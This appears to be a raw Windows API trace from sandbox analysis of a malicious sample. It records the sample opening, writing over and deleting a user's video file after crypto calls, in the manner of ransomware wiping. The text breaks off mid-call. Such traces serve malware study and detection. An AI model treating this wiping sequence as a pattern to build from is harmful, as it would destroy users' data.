CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0198.239] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.239] CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0198.239] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.239] FreeLibrary (hLibModule=0x74f20000) returned 1 [0198.240] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0198.240] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\d8qDzfY_.swf", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0f4c60, ftCreationTime.dwHighDateTime=0x1d5e3e5, ftLastAccessTime.dwLowDateTime=0x632e5550, ftLastAccessTime.dwHighDateTime=0x1d5e6ce, ftLastWriteTime.dwLowDateTime=0x632e5550, ftLastWriteTime.dwHighDateTime=0x1d5e6ce, nFileSizeHigh=0x0, nFileSizeLow=0x12628, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="d8qDzfY_.swf", cAlternateFileName="")) returned 0x90af58 [0198.241] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0198.241] CharLowerBuffW (in: lpsz="byte[75304]", cchLength=0xb | out: lpsz="byte[75304]") returned 0xb [0198.241] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0198.253] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0198.253] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0198.254] FreeLibrary (hLibModule=0x75c90000) returned 1 [0198.254] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0198.254] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0198.254] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0198.254] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\d8qDzfY_.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghioo2t\\d8qdzfy_.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0198.254] FreeLibrary (hLibModule=0x75990000) returned 1 [0198.254] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0198.255] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.255] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0198.255] FreeLibrary (hLibModule=0x75990000) returned 1 [0198.255] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0198.255] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.255] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0198.256] FreeLibrary (hLibModule=0x75990000) returned 1 [0198.256] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\d8qDzfY_.swf", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\d8qDzfY_.swf", lpFilePart=0x0) returned 0x39 [0198.256] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\d8qDzfY_.swf", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0f4c60, ftCreationTime.dwHighDateTime=0x1d5e3e5, ftLastAccessTime.dwLowDateTime=0x632e5550, ftLastAccessTime.dwHighDateTime=0x1d5e6ce, ftLastWriteTime.dwLowDateTime=0x1b150820, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x12628, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="d8qDzfY_.swf", cAlternateFileName="")) returned 0x90af58 [0198.256] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\d8qDzfY_.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghioo2t\\d8qdzfy_.swf")) returned 1 [0198.258] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0f4c60, ftCreationTime.dwHighDateTime=0x1d5e3e5, ftLastAccessTime.dwLowDateTime=0x632e5550, ftLastAccessTime.dwHighDateTime=0x1d5e6ce, ftLastWriteTime.dwLowDateTime=0x1b150820, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x12628, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="d8qDzfY_.swf", cAlternateFileName="")) returned 0 [0198.258] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0198.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5de0 | out: hHeap=0x8a0000) returned 1 [0198.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0198.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0198.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0198.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0198.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0198.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0198.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0198.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0198.260] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0198.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0198.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0198.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0198.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0198.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0198.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0198.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0198.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0198.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0198.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0198.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0198.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0198.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0198.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0198.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc198 | out: hHeap=0x8a0000) returned 1 [0198.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0198.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0198.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0198.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0198.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0198.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0198.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0198.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0198.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0198.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0198.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0198.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df190 | out: hHeap=0x8a0000) returned 1 [0198.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0198.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0198.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0198.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0198.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0198.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0198.262] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0198.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0198.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0198.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0198.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0198.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0198.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0198.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0198.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0198.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0198.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0198.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0198.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0198.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0198.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0198.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0198.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0198.263] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0198.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0198.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0198.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0198.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1d30 [0198.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0198.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0198.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0198.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0198.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0198.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba408 [0198.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0198.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0198.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0198.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0198.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0198.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0198.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0198.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0198.263] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0198.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0198.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0198.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0198.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0198.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0198.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0198.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0198.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0198.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0198.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0198.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0198.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0198.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0198.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0198.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0198.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0198.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0198.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0198.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0198.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0198.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0198.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0198.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0198.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0198.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0198.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0198.265] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.265] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.265] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="swf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.265] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".swf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0198.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0198.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0198.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0198.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0198.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0198.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0198.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0198.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0198.265] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0198.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0198.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0198.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0198.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0198.265] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0198.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0198.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0198.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0198.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0198.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0198.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0198.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0198.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0198.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0198.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0198.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0198.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0198.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0198.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0198.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0198.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0198.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0198.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0198.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0198.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0198.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0198.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0198.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0198.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0198.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0198.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0198.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0198.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0198.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0198.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0198.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0198.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0198.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0198.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0198.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0198.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0198.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0198.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0198.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0198.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0198.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0198.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0198.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0198.267] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0198.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0198.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0198.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0198.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0198.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0198.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0198.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0198.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0198.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0198.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0198.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0198.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0198.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0198.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0198.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0198.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0198.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0198.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0198.268] HeapFree (in: hHeap=0x8a0000, 